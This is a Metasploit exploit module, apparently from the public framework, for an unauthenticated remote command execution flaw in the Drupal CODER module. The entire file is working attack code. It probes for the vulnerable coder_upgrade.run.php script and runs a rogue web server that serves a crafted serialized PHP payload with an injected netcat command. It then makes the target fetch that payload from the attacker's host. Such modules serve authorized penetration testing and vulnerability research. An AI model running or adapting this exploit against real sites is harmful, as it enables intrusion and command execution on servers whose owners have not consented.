1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
def initialize(info={})
super(update_info(info,
'Name' => 'Drupal CODER Module Remote Command Execution',
'Description' => %q{
This module exploits a Remote Command Execution vulnerability in
Drupal CODER Module. Unauthenticated users can execute arbitrary command
under the context of the web server user.
CODER module doesn't sufficiently validate user inputs in a script file
that has the php extension. A malicious unauthenticated user can make
requests directly to this file to execute arbitrary command.
The module does not need to be enabled for this to be exploited
This module was tested against CODER 2.5 with Drupal 7.5 installation on Ubuntu server.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nicky Bloor', # discovery
'Mehmet Ince <mehmet@mehmetince.net>' # msf module
],
'References' =>
[
['URL', 'https://www.drupal.org/node/2765575']
],
'Privileged' => false,
'Payload' =>
{
'Space' => 225,
'DisableNops' => true,
'BadChars' => "\x00\x2f",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat netcat-e'
},
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => 'Jul 13 2016',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/']),
OptAddress.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']),
OptPort.new('SRVPORT', [true, 'Bogus web server port to listen'])
]
)
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
)
if res && res.code == 200
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def on_request_uri(cli, _request)
print_status("Incoming request detected...")
p = ''
p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}'
p << 's:11:"theme_cache";s:16:"theme_cache_test";'
p << 's:9:"variables";s:14:"variables_test";'
p << 's:8:"upgrades";a:1:{i:0;a:2:{s:4:"path";s:2:"..";s:6:"module";s:3:"foo";}}'
p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}'
p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";'
p << 's:7:"new_dir";s:'
p << (payload.encoded.length + 14).to_s
p << ':"f --help && '
p << payload.encoded
p << ' #";s:4:"name";s:4:"test";}}}'
print_status("Sending payload...")
send_response(cli, p)
end
def exploit
start_service
send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
'encode_params' => false,
'vars_get' => {
'file' => get_uri
}
)
stop_service
end
end
|
